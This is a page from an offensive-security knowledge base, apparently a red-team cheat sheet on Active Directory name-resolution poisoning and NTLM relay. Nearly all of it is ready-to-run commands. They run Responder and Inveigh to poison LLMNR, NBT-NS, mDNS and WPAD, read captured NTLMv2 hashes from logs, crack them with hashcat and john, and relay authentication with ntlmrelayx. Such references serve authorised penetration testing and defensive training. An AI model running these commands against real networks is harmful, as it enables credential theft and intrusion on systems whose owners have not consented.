Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks / Techqniues

Poisoning and Capture

Poisoning is the passive entry point for relay and hash capture. We answer name resolution traffic such as LLMNR, NBT-NS, mDNS, or WPAD, then capture or relay the authentication that follows.

Responder analyze mode

sudo responder -I eth0 -A

Responder capture mode

sudo responder -I eth0
sudo responder -I eth0 -rdw

Responder WPAD

sudo responder -I eth0 -w

Responder loot

ls -la /usr/share/responder/logs/
cat /usr/share/responder/logs/*NTLMv2*.txt

Crack captured NetNTLMv2

hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt /usr/share/responder/logs/*NTLMv2*.txt

Inveigh from Windows

.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console 3
.\Inveigh.exe -NBNS Y -LLMNR Y -Console 1 -FileOutput Y
.\Inveigh.exe -WPADAuth NTLM -Console Y -FileOutput Y

Inveigh PowerShell

Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -WPADAuth NTLM -HTTP Y -ConsoleOutput Y
Get-Inveigh -NTLMv2
Stop-Inveigh

Poisoning into relay target file

ntlmrelayx.py -tf smb-relay-targets.txt -smb2support

Trigger examples

dir \\10.10.10.100\share
type \\10.10.10.100\share\file.txt
nslookup fakehost 10.10.10.100

Notes

Use analyze mode first when mapping a network. Capture mode and WPAD are louder because they answer client traffic.

Do not run Responder and Inveigh on the same segment at the same time. They will compete for the same traffic.